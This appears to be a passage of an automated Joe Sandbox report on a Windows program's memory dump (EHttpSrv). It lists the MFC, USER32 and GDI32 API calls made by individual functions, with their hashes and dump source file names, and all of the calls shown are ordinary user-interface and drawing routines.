                                                                                                                • Opcode ID: 95a512bd18d49e5b41d9fd54168a7648ccddea19e9f514ca4a0a111cf68669ff
                                                                                                                • Instruction ID: 5275b61e0ee0031b6ecf05bdd452a348e85caa2ed6d8c871efa71e3b98f74fc1
                                                                                                                • Opcode Fuzzy Hash: 95a512bd18d49e5b41d9fd54168a7648ccddea19e9f514ca4a0a111cf68669ff
                                                                                                                • Instruction Fuzzy Hash: 43515171108780AFD325DF54CC85B9BBBE8FF94B15F408A2DF49592290DB799508CB93
                                                                                                                APIs
                                                                                                                • #314.MFC80U(00000000,FEEA6C22), ref: 2045C44D
                                                                                                                • SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 2045C48D
                                                                                                                • #310.MFC80U ref: 2045C499
                                                                                                                • #3985.MFC80U(00000000), ref: 2045C4B7
                                                                                                                • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 2045C4D3
                                                                                                                • #2861.MFC80U(00000000), ref: 2045C4F0
                                                                                                                • #776.MFC80U(?,00000000), ref: 2045C525
                                                                                                                • #2490.MFC80U(00000000,?,?), ref: 2045C5C7
                                                                                                                • SendMessageW.USER32(?,0000110A,00000001,00000000), ref: 2045C773
                                                                                                                  • Part of subcall function 204110E0: #764.MFC80U(?,?,?,?,204127C5,?,20462D02), ref: 2041110A
                                                                                                                  • Part of subcall function 204110E0: #764.MFC80U(20462D01,?,?,?,204127C5,?,20462D02), ref: 2041111A
                                                                                                                  • Part of subcall function 204110E0: #764.MFC80U(?,?,?,?,204127C5,?,20462D02), ref: 2041112A
                                                                                                                  • Part of subcall function 204110E0: #764.MFC80U(?,?,?,?,204127C5,?,20462D02), ref: 2041113A
                                                                                                                  • Part of subcall function 204110E0: #265.MFC80U(00000000,?,?,?,204127C5,?,20462D02), ref: 20411183
                                                                                                                  • Part of subcall function 204110E0: #265.MFC80U(00000000,?,?,?,204127C5,?,20462D02), ref: 204111E3
                                                                                                                • #764.MFC80U(?,00000000,?,00000000,?,?), ref: 2045C614
                                                                                                                • #764.MFC80U(?,00000000,?,00000000,?,?), ref: 2045C625
                                                                                                                • #764.MFC80U(?,00000000,?,00000000,?,?), ref: 2045C636
                                                                                                                • #764.MFC80U(?,00000000,?,00000000,?,?), ref: 2045C647
                                                                                                                • SendMessageW.USER32(?,0000110A,00000001,00000000), ref: 2045C666
                                                                                                                • #2490.MFC80U(00000000), ref: 2045C6AB
                                                                                                                • #2490.MFC80U(00000000,?,?,00000000), ref: 2045C6D8
                                                                                                                • #764.MFC80U(?,?,00000000,?,?,00000000), ref: 2045C710
                                                                                                                • #764.MFC80U(?,?,00000000,?,?,00000000), ref: 2045C721
                                                                                                                • #764.MFC80U(?,?,00000000,?,?,00000000), ref: 2045C732
                                                                                                                • SendMessageW.USER32(?,0000110A,00000001,00000000), ref: 2045C752
                                                                                                                • #578.MFC80U ref: 2045C795
                                                                                                                • #6751.MFC80U(00000000,?), ref: 2045C7C3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764$MessageSend$#2490$#265$#2861#310#314#3985#578#6751#776
                                                                                                                • String ID:
                                                                                                                • API String ID: 127330169-0
                                                                                                                • Opcode ID: c2c1206fa169155401c6923bab718468637c0c69534597cf16fa5b64ca2c6bdd
                                                                                                                • Instruction ID: 5fde8703c6c66e609bc096ed0fb25f270494e9225abf0c7c4514f78428edfbf5
                                                                                                                • Opcode Fuzzy Hash: c2c1206fa169155401c6923bab718468637c0c69534597cf16fa5b64ca2c6bdd
                                                                                                                • Instruction Fuzzy Hash: 0FB161716043019FD710DFA4C881F9BBBE4BFA8648F04C91CF95987251EB79EA48CB91
                                                                                                                APIs
                                                                                                                • #501.MFC80U(?,FEEA6C22), ref: 204380B5
                                                                                                                • #2521.MFC80U(?,?,FEEA6C22), ref: 204380CC
                                                                                                                • #347.MFC80U(?,?,FEEA6C22), ref: 204380D5
                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 204380E7
                                                                                                                • #1270.MFC80U(00000000), ref: 204380F2
                                                                                                                • LPtoDP.GDI32(?,?,00000002), ref: 20438103
                                                                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 20438144
                                                                                                                • #1271.MFC80U(00000000), ref: 2043814F
                                                                                                                • #5633.MFC80U(?,?,00000000), ref: 2043815E
                                                                                                                • GetMapMode.GDI32(?,?,?,00000000), ref: 2043816A
                                                                                                                • #5884.MFC80U(00000000), ref: 20438175
                                                                                                                • GetBkColor.GDI32(?), ref: 2043817F
                                                                                                                • #5723.MFC80U(00000000), ref: 2043818C
                                                                                                                • GetTextColor.GDI32(?), ref: 20438196
                                                                                                                • #6033.MFC80U(00000000), ref: 204381A1
                                                                                                                • DPtoLP.GDI32(?,?,00000002), ref: 204381B2
                                                                                                                • #6058.MFC80U(?,?,?), ref: 204381CB
                                                                                                                • #2255.MFC80U(?,00000000,?,?,?), ref: 204381DA
                                                                                                                • BitBlt.GDI32(?,?,?,?,?,?,?,?,00CC0020), ref: 20438208
                                                                                                                • #5633.MFC80U(?,00000000), ref: 2043821B
                                                                                                                • #602.MFC80U(?,00000000), ref: 2043824D
                                                                                                                • #709.MFC80U(?,00000000), ref: 20438261
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #5633ColorCompatibleCreate$#1270#1271#2255#2521#347#501#5723#5884#602#6033#6058#709BitmapModeText
                                                                                                                • String ID:
                                                                                                                • API String ID: 2901122701-0
                                                                                                                • Opcode ID: 078ad46cc0a4d2776df4ddafef8a383dcd76b06343dead18b5f7682e13ee46c3
                                                                                                                • Instruction ID: 8ae041d4327c59bec469319d960c77a5f5bff641b4c54045de56944f76c38e2a
                                                                                                                • Opcode Fuzzy Hash: 078ad46cc0a4d2776df4ddafef8a383dcd76b06343dead18b5f7682e13ee46c3
                                                                                                                • Instruction Fuzzy Hash: C4511A72118380AFC314CBA4CC85FABBBB8FBD9A14F008A1DF59597250DB35A904CB62
                                                                                                                APIs
                                                                                                                • #2872.MFC80U(00000000,00000002,FEEA6C22,?,00000000,00000000,?), ref: 204361BF
                                                                                                                • GetSysColor.USER32(00000005), ref: 2043627F
                                                                                                                • GetSysColor.USER32(0000000D), ref: 20436295
                                                                                                                • GetSysColor.USER32(0000000E), ref: 2043629B
                                                                                                                • #2255.MFC80U(?,00000000,?,00000000,00000000,?), ref: 204362A9
                                                                                                                • GetCurrentObject.GDI32(?,00000006), ref: 204362F1
                                                                                                                • #2362.MFC80U(00000000,?,00000000,00000000,?), ref: 204362F8
                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 2043630B
                                                                                                                • #2362.MFC80U(00000000,?,00000000,00000000,?), ref: 20436312
                                                                                                                • GetObjectW.GDI32(?,0000005C,?), ref: 20436326
                                                                                                                • #1925.MFC80U(?,00000000,00000000,?), ref: 2043635E
                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 20436368
                                                                                                                • #1271.MFC80U(00000000,?,00000000,00000000,?), ref: 20436374
                                                                                                                • CopyRect.USER32(?,?), ref: 20436392
                                                                                                                • #5727.MFC80U(00000001,?,00000000,00000000,?), ref: 204363BC
                                                                                                                • #1079.MFC80U(?,00000000), ref: 204363D4
                                                                                                                • #1079.MFC80U(?,?,?,?,?,00000001), ref: 20436402
                                                                                                                • GetSystemMetrics.USER32(00000031), ref: 20436416
                                                                                                                • #6735.MFC80U(?), ref: 20436434
                                                                                                                • #578.MFC80U ref: 20436471
                                                                                                                • #5727.MFC80U(?), ref: 2043647E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$#1079#2362#5727Object$#1271#1925#2255#2872#578#6735CopyCreateCurrentFontIndirectMessageMetricsRectSendSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 3417120401-0
                                                                                                                • Opcode ID: fbb5713d10b500bb0ddd90dabc36e43dcc18d4f2127db6884119fbddb8766d62
                                                                                                                • Instruction ID: 02342d8d71c409c69d00bd3735ca41ed132bb34a9b4c2763180ef7ad355d78db
                                                                                                                • Opcode Fuzzy Hash: fbb5713d10b500bb0ddd90dabc36e43dcc18d4f2127db6884119fbddb8766d62
                                                                                                                • Instruction Fuzzy Hash: 8FA16A716043419FD724DFA4C894FABB7E9BF88714F11CA6DF9499B391DA38A800CB52
                                                                                                                APIs
                                                                                                                • GetClientRect.USER32(?,?), ref: 20432013
                                                                                                                • GetParent.USER32(?), ref: 2043201D
                                                                                                                • #2366.MFC80U(00000000), ref: 20432024
                                                                                                                • SendMessageW.USER32(?,00000138,?,?), ref: 20432053
                                                                                                                • GetBkColor.GDI32(?), ref: 2043205F
                                                                                                                • GetTextColor.GDI32(?), ref: 20432076
                                                                                                                • #2362.MFC80U(00000000), ref: 20432085
                                                                                                                • FillRect.USER32(?,?,00000000), ref: 2043209C
                                                                                                                • FillRect.USER32(?,?,?), ref: 204320B1
                                                                                                                  • Part of subcall function 2043BAC0: GetCurrentObject.GDI32(?,00000006), ref: 2043BAF1
                                                                                                                  • Part of subcall function 2043BAC0: GetObjectW.GDI32(00000000,0000005C,?), ref: 2043BB01
                                                                                                                  • Part of subcall function 2043BAC0: CreateFontIndirectW.GDI32(?), ref: 2043BB0C
                                                                                                                  • Part of subcall function 2043BAC0: SelectObject.GDI32(?,00000000), ref: 2043BB14
                                                                                                                  • Part of subcall function 2043BAC0: SelectObject.GDI32(?,00000000), ref: 2043BB3C
                                                                                                                  • Part of subcall function 2043BAC0: DeleteObject.GDI32(00000000), ref: 2043BB43
                                                                                                                • InflateRect.USER32(?,000000FE,00000000), ref: 204320DC
                                                                                                                • #5727.MFC80U(00000001), ref: 20432108
                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 20432129
                                                                                                                • #2362.MFC80U(00000000), ref: 20432130
                                                                                                                • #764.MFC80U(?), ref: 2043214F
                                                                                                                • #5727.MFC80U(?), ref: 204321EA
                                                                                                                  • Part of subcall function 204316C0: SetRectEmpty.USER32(?), ref: 204316D3
                                                                                                                  • Part of subcall function 204316C0: SetRectEmpty.USER32(?), ref: 204316DA
                                                                                                                  • Part of subcall function 204316C0: SetRectEmpty.USER32(?), ref: 204316DD
                                                                                                                  • Part of subcall function 204316C0: CopyRect.USER32(?,?), ref: 20431721
                                                                                                                  • Part of subcall function 204316C0: CopyRect.USER32(?,?), ref: 2043172F
                                                                                                                • GetFocus.USER32 ref: 20432230
                                                                                                                • #2366.MFC80U(00000000,?,?,?), ref: 20432237
                                                                                                                • DrawFocusRect.USER32(?,?), ref: 2043224D
                                                                                                                • DrawFocusRect.USER32(?,?), ref: 20432262
                                                                                                                • DrawFocusRect.USER32(?,?), ref: 20432277
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$Object$Focus$DrawEmpty$#2362#2366#5727ColorCopyFillMessageSelectSend$#764ClientCreateCurrentDeleteFontIndirectInflateParentText
                                                                                                                • String ID:
                                                                                                                • API String ID: 2675783874-0
                                                                                                                • Opcode ID: b180d1408771614da0c1c48bec4abd0d5b74ec03b1dbede2c11c350b72fa5edf
                                                                                                                • Instruction ID: cd54de75ae23a6b363c5d34842b5dadbeaba6e3f888a96cf96408ed18cc99268
                                                                                                                • Opcode Fuzzy Hash: b180d1408771614da0c1c48bec4abd0d5b74ec03b1dbede2c11c350b72fa5edf
                                                                                                                • Instruction Fuzzy Hash: 64912C71604240AFCB44DFA8CD84EAA77B9BFC8704F24866DFD498B255DA38ED05CB61
                                                                                                                APIs
                                                                                                                • #310.MFC80U(FEEA6C22), ref: 20454761
                                                                                                                • #310.MFC80U ref: 20454773
                                                                                                                • #4026.MFC80U(000000AD), ref: 2045478A
                                                                                                                • #4026.MFC80U(000000AE), ref: 20454799
                                                                                                                • #900.MFC80U( (*.exe)|*.exe|), ref: 204547A8
                                                                                                                • #896.MFC80U(?), ref: 204547B7
                                                                                                                • #900.MFC80U( (*.*)|*.*|), ref: 204547C6
                                                                                                                • #385.MFC80U(00000001,00000000,00000000,00881001,?,?,00000000), ref: 204547E0
                                                                                                                • #2012.MFC80U(00000001,00000000,00000000,00881001,?,?,00000000), ref: 204547F1
                                                                                                                • #3082.MFC80U(?,00000001,00000000,00000000,00881001,?,?,00000000), ref: 20454808
                                                                                                                  • Part of subcall function 2040E820: #764.MFC80U(?,00000000,?,2040F224,?,00000001), ref: 2040E830
                                                                                                                  • Part of subcall function 2040E820: #265.MFC80U(00000000,?,00000000,?,2040F224,?,00000001), ref: 2040E876
                                                                                                                  • Part of subcall function 2040E820: _wcsupr_s.MSVCR80 ref: 2040E896
                                                                                                                • #578.MFC80U(?,00000001,?,00000001,00000000,00000000,00881001,?,?,00000000), ref: 20454833
                                                                                                                • SendMessageW.USER32(?,0000101E,00000001,0000FFFF), ref: 20454897
                                                                                                                • #630.MFC80U(00000001,00000000,00000000,00881001,?,?,00000000), ref: 204548B6
                                                                                                                • #578.MFC80U(00000001,00000000,00000000,00881001,?,?,00000000), ref: 204548C7
                                                                                                                • #578.MFC80U(?,00000000), ref: 204548D9
                                                                                                                • #764.MFC80U(00000000,?,00000000), ref: 204548EF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #578$#310#4026#764#900$#2012#265#3082#385#630#896MessageSend_wcsupr_s
                                                                                                                • String ID: (*.*)|*.*|$ (*.exe)|*.exe|
                                                                                                                • API String ID: 4155270257-1718033337
                                                                                                                • Opcode ID: 1cddeaf09556f71b27d46462ae54488118dae2c83bbfc0590247355c0c1c9202
                                                                                                                • Instruction ID: c93757d751d0b7f6ce5e584a57ba34fd33dfaff37aad5596ab69ee7b61a1648e
                                                                                                                • Opcode Fuzzy Hash: 1cddeaf09556f71b27d46462ae54488118dae2c83bbfc0590247355c0c1c9202
                                                                                                                • Instruction Fuzzy Hash: 8D517371108780AFC325DF54CC85B9BBBE8FF94B19F408A2DF495922A0DB759508CB93
                                                                                                                APIs
                                                                                                                  • Part of subcall function 2042C250: #4574.MFC80U(?,20457514), ref: 2042C253
                                                                                                                • #2651.MFC80U(000004F3), ref: 2045884D
                                                                                                                • GetWindowRect.USER32(?,?), ref: 20458863
                                                                                                                • #2155.MFC80U(00000000), ref: 20458871
                                                                                                                • #6086.MFC80U(00000000,00000000), ref: 2045887A
                                                                                                                • #2651.MFC80U(0000042A,00000000,00000000), ref: 20458886
                                                                                                                • GetWindowRect.USER32(?,?), ref: 20458896
                                                                                                                • #5609.MFC80U(?), ref: 2045889F
                                                                                                                • #4119.MFC80U(?,?,?,?,00000001,?), ref: 204588C6
                                                                                                                • #2651.MFC80U(000004F7,?,?,?,?,00000001,?), ref: 204588D2
                                                                                                                • GetWindowRect.USER32(?,?), ref: 204588E2
                                                                                                                • #5609.MFC80U(?), ref: 204588EB
                                                                                                                • #4119.MFC80U(?,?,?,?,00000001,?), ref: 20458912
                                                                                                                • #2651.MFC80U(0000040B,?,?,?,?,00000001,?), ref: 2045891E
                                                                                                                • GetWindowRect.USER32(?,?), ref: 2045892E
                                                                                                                • #5609.MFC80U(?), ref: 20458937
                                                                                                                • #4119.MFC80U(?,?,?,?,00000001,?), ref: 20458964
                                                                                                                • #2651.MFC80U(00001772,?,?,?,?,00000001,?), ref: 20458970
                                                                                                                • GetWindowRect.USER32(?,?), ref: 20458980
                                                                                                                • #5609.MFC80U(?), ref: 20458989
                                                                                                                • #4119.MFC80U(?,?,?,?,00000001,?), ref: 204589B6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2651RectWindow$#4119#5609$#2155#4574#6086
                                                                                                                • String ID:
                                                                                                                • API String ID: 1988953342-0
                                                                                                                • Opcode ID: c13e60bc6c3f0ce5ac8287fcc5224fca9e2dc996d1ea6a8cbbada187e44eb291
                                                                                                                • Instruction ID: 459a22ac6ff8665e4377593c6da4157b1f8012e2bbd72c92c5f2a2fa9f544e88
                                                                                                                • Opcode Fuzzy Hash: c13e60bc6c3f0ce5ac8287fcc5224fca9e2dc996d1ea6a8cbbada187e44eb291
                                                                                                                • Instruction Fuzzy Hash: 29515FB13043069FD704DFA8CC55EBFB7E9EBC8A08F008A2DB58597291DA78EC058795
                                                                                                                APIs
                                                                                                                  • Part of subcall function 2042C250: #4574.MFC80U(?,20457514), ref: 2042C253
                                                                                                                • #2651.MFC80U(000004F6), ref: 2045754D
                                                                                                                • GetWindowRect.USER32(?,?), ref: 20457563
                                                                                                                • #2155.MFC80U(00000000), ref: 20457571
                                                                                                                • #6086.MFC80U(00000000,00000000), ref: 2045757A
                                                                                                                • #2651.MFC80U(0000042A,00000000,00000000), ref: 20457586
                                                                                                                • GetWindowRect.USER32(?,?), ref: 20457596
                                                                                                                • #5609.MFC80U(?), ref: 2045759F
                                                                                                                • #4119.MFC80U(?,?,?,?,00000001,?), ref: 204575C6
                                                                                                                • #2651.MFC80U(000004F8,?,?,?,?,00000001,?), ref: 204575D2
                                                                                                                • GetWindowRect.USER32(?,?), ref: 204575E2
                                                                                                                • #5609.MFC80U(?), ref: 204575EB
                                                                                                                • #4119.MFC80U(?,?,?,?,00000001,?), ref: 20457612
                                                                                                                • #2651.MFC80U(0000040B,?,?,?,?,00000001,?), ref: 2045761E
                                                                                                                • GetWindowRect.USER32(?,?), ref: 2045762E
                                                                                                                • #5609.MFC80U(?), ref: 20457637
                                                                                                                • #4119.MFC80U(?,?,?,?,00000001,?), ref: 20457664
                                                                                                                • #2651.MFC80U(00001772,?,?,?,?,00000001,?), ref: 20457670
                                                                                                                • GetWindowRect.USER32(?,?), ref: 20457680
                                                                                                                • #5609.MFC80U(?), ref: 20457689
                                                                                                                • #4119.MFC80U(?,?,?,?,00000001,?), ref: 204576B6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2651RectWindow$#4119#5609$#2155#4574#6086
                                                                                                                • String ID:
                                                                                                                • API String ID: 1988953342-0
                                                                                                                • Opcode ID: e1965dff9c50a29cb80de7048452725fb93de9bb5d2244790109066319457e8f
                                                                                                                • Instruction ID: 0654eef182be6b3dd22a090d9fa8510fa7f27e5aa5ffc964efdf0b45828594fc
                                                                                                                • Opcode Fuzzy Hash: e1965dff9c50a29cb80de7048452725fb93de9bb5d2244790109066319457e8f
                                                                                                                • Instruction Fuzzy Hash: 4D515FB13043069FD704DF68CC55E7FB7E9EBD8A08F008A2CB59597291EA78EC058B95
                                                                                                                APIs
                                                                                                                • GetClientRect.USER32(?,?), ref: 204307BC
                                                                                                                • #310.MFC80U ref: 204307CC
                                                                                                                • #1053.MFC80U(?,?,00000000,0000002C), ref: 204307DF
                                                                                                                • #310.MFC80U(?,?,00000000,0000002C), ref: 204307F0
                                                                                                                • #1053.MFC80U(?,?,00000000,0000003D), ref: 20430809
                                                                                                                • #774.MFC80U(?,?,?,00000000,0000003D), ref: 2043081B
                                                                                                                • #310.MFC80U(?,?,00000000,0000003D), ref: 20430828
                                                                                                                • #1053.MFC80U(?,?,00000001,0000003D), ref: 20430841
                                                                                                                • _wtol.MSVCR80 ref: 2043084F
                                                                                                                • #3869.MFC80U(00000000,?,00000000,?,000000FF,?,?,00000001,0000003D), ref: 20430896
                                                                                                                • #578.MFC80U(00000000,?,00000000,?,000000FF,?,?,00000001,0000003D), ref: 204308A7
                                                                                                                • #578.MFC80U ref: 204308B6
                                                                                                                • #1053.MFC80U(?,?,-00000001,0000002C), ref: 204308C8
                                                                                                                • #3395.MFC80U(?,?,00000000,0000002C), ref: 204308E8
                                                                                                                • #2788.MFC80U(?,?,00000000,0000002C), ref: 204308F6
                                                                                                                • SendMessageW.USER32(?,00001200), ref: 20430918
                                                                                                                • SendMessageW.USER32(?,0000120B,-00000001,?), ref: 2043092E
                                                                                                                • GetSystemMetrics.USER32(00000002), ref: 20430936
                                                                                                                • SendMessageW.USER32(?,0000120C,-00000001,?), ref: 2043094F
                                                                                                                • #578.MFC80U ref: 2043095D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1053$#310#578MessageSend$#2788#3395#3869#774ClientMetricsRectSystem_wtol
                                                                                                                • String ID:
                                                                                                                • API String ID: 4280695641-0
                                                                                                                • Opcode ID: 676eb742b4dfb1185c0e4fb7d7c19ae165f7a604b4f69baca16d50a8ddea98de
                                                                                                                • Instruction ID: d3306c2dc2b6d7d4adad176fa29cd68a2cf19bfba0a0eb39b50f631a340e2902
                                                                                                                • Opcode Fuzzy Hash: 676eb742b4dfb1185c0e4fb7d7c19ae165f7a604b4f69baca16d50a8ddea98de
                                                                                                                • Instruction Fuzzy Hash: A751A071508701ABE314DB65CC94F5BBBE4FB98B54F108B1CF595922E0DB78E904CB92
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #4026wcscpy_s$memset$#310wcsncpy_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 2764536694-0
                                                                                                                • Opcode ID: ebad0841af5831171d73bf8388fe049bd1bd72ce455b8242ac7a8760335e44c4
